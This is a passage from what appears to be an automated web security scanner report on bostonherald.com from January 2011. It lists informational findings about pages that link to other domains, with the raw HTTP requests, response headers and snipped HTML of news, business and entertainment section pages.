Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:08:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 89129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Findex.bg&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Wal-Mart seeks opening"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0">
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312519&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20110127/stp/fabb2e_fin_01282011.jpg" alt="LIVELY DISCUSSION: Panel members, from left, Olivier Blanchard, Robert Gordon and N. Gregory Mankiw talked about fiscal policy at an MIT panel discussion yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/general/view.bg?articleid=1312647&format=comments&srvc=business&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/technology/general/view.bg?articleid=1312544&format=comments&srvc=business&position=3">
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312530&srvc=business&position=4"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg" alt="SPICING IT UP: Charlie Larner, left, and Michael Winter stand inside the soonto-
be Mija Cantina & Tequila Bar inside a renovated Sam&#x2019;s Cafe at Faneuil Hall
Marketplace.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/general/view.bg?articleid=1312530&format=comments&srvc=business&position=4">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/general/view/20110128bank_forecloses_on_mass_supplements_seller_goes/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg" alt="This a copy of an ad provided by Taco Bell. Taco Bell is launching an advertising campaign Friday, Jan. 28, 2011 to fight back against a lawsuit charging its taco filling isn&rsquo;t beef." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/format=comments&srvc=business&position=also">
...[SNIP]...
<h3><a href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Recent Headlines from AP</a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/the_ticker/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/ticker.gif" alt="The Ticker" />
           State hands out $24M in tax breaks to life sciences firms
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/working_stiff/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/workingStiff.gif" alt="Working Stiff" />
           Five dating tips for first-time job hunters
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/getting_real/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/getting_real.gif" alt="Getting Real" />
           Fed homebuyer tax credit may actually raise $
           </a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business" target="_new">All Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/automotive" target="_new">Automotive</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/general" target="_new">Business & Markets</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/healthcare" target="_new">Healthcare</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/media" target="_new">Media & marketing</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/real_estate" target="_new">Real Esate</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology" target="_new">Technology</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology/reviews" target="_new">Technology Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/womens" target="_new">Women's Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/jobfind/news/your_career" target="_new">Your Career - Jobfind</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<span class="bold" /><a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Quote:</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">52 Week High/low</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&amp;idx=3&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Index Performance</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Market Movers</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a>
...[SNIP]...
<td class="t4" align="left" height="15" colspan="5"><a href="http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn" class="head-link">Overnight
Averages</a>
...[SNIP]...
<td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&amp;prods=1" class="sidebar-link">30 yr fixed mtg</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&amp;prodtype=M&amp;thisponsor=cf1&amp;ad=mtg&amp;nav=mtg30year_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...

7.4. http://www.bostonherald.com/business/general/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /business/general/?srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60852


7.5. http://www.bostonherald.com/business/general/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view.bg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /business/general/view.bg?articleid=1312531&srvc=home&position=rated HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088


7.6. http://www.bostonherald.com/entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /entertainment/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 103253

...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312518&format=comments&srvc=edge&position=2">
...[SNIP]...
<a href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&srvc=edge&position=3"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/bb4051_Banditas_01282011.jpg" alt="TWO OF A KIND: Hayley Thompson-King, left, and Molly Maltezos provide the harmony for Banditas."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&format=comments&srvc=edge&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&position=0">
...[SNIP]...
<a href="/users/register/?pre_select=90">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/spread_the_love_177x57.gif" alt="Spread the Love" />
</a>
...[SNIP]...
<a href="/entertainment/arts_culture/view/20110127cheap_thrills">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/cheap_thrills_177x57.gif" alt="Cheap_thrills" />
</a>
...[SNIP]...
<a href="/entertainment/music/general/view/20110128gigs_music_for_your_weekend">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/gigs_around_town_177x57.gif" alt="Gigs_around_town" />
</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/0c3b6e_Zenith_01282011.jpg" alt="MAD WORLD: Peter Scanavino stars in &#x2018;Zenith,&#x2019; about a dystopian future." /></a>
...[SNIP]...
<a href="/entertainment/television/general/view/20110128oprah_protege_nate_berkus_has_designs_on_daytime/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cccb20_nberkus012811.jpg" alt="Nate Berkus." /></a>
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128gotta_love_it/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/31c0bc_ltpWatch012811.jpg" alt="Watch: &lsquo;Portlandia&rsquo;" /></a>
...[SNIP]...
<a href="/entertainment/health/nutrition/view/20110126jack_lalanne_changed_exercising_but_he_didnt_change_many_bodies/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/ff0551_jlalanne012611.jpg" alt="In this Nov. 7, 1975 file photo, fitness expert Jack LaLanne, 61, comes out of the chilly water after a successful swim from the Marin County side along the Golden Gate Bridge to San Francisco." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/health/nutrition/view/20110126jack_lalanne_changed_exercising_but_he_didnt_change_many_bodies/format=comments&srvc=edge&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/food_dining/reviews/view/20110128darryls_raises_bar_on_soul_food_music/format=comments&srvc=edge&position=also">
...[SNIP]...
<a href="/entertainment/arts_culture/view/20110127forever_young_theaters_the_fountain_of_youth_for_4-foot-11_harvard_law_instructor/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/39b0d8_garden_01272011.jpg" alt="CHILD&#x2019;S PLAY: Katherine Leigh Doherty, left, and Jennifer Beth Glick perform in &#x2018;The Secret Garden.&#x2019;" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/arts_culture/view/20110127forever_young_theaters_the_fountain_of_youth_for_4-foot-11_harvard_law_instructor/format=comments&srvc=edge&position=also">
...[SNIP]...
<a href="/entertainment/fashion/view/20110127ready_aim_zap_at-home_laser_offers_new_wrinkle_in_the_fight_vs_crows_feet/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/4149d9_eyes_01272011.jpg" alt="" /></a>
...[SNIP]...
<a href="/entertainment/travel/view/20110127disney_gone_wild_animal_kingdoms_new_tour_offers_an_african_safari_of_a_lifetime/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/964bf5_rope_01272011.jpg" alt="ROPE SWING: Adventure comes alive at Disney&#x2019;s Animal Kingdom as intrepid explorers get up close and personal with park wildlife including hippos and crocodiles lurking over the edge of a cliff." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/travel/view/20110127disney_gone_wild_animal_kingdoms_new_tour_offers_an_african_safari_of_a_lifetime/format=comments&srvc=edge&position=also">
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment" target="_new">All Entertainment</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/" target="_new">Arts & Culture</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/" target="_new">Movie Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/" target="_new">Movie News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/" target="_new">Music News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/reviews/" target="_new">Disc Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/food_dining/" target="_new">Dining News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/health/" target="_new">Health & Fitness</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/travel/" target="_new">Travel</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/lifestyle/" target="_new">Lifestyle</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/fashion/" target="_new">Fashion</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/television/" target="_new">Television News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/books/" target="_new">Books</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_300x100.jpg" style="border: 1px #333 solid;" /></a>
...[SNIP]...
<a class="LinksRed2None" href="/blogs/entertainment/the_assistant/?srvc=edge&position=recent">
<img style="float:left; border:0;margin:0px 3px 0 0;padding:0;width:155px;height:50px;" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" border=0 />
</a>
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" alt="Age Gap of the Week: Lydia Hearst, 26, and Jeff Goldblum, 58" />
           Age Gap of the Week: Lydia Hearst, 26, and Jeff Goldblum, 58
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/guestlisted.jpg" alt="Exclusive video: Banditas strike!" />
           Exclusive video: Banditas strike!
           </a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/c1e423_ltpSteam012811.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
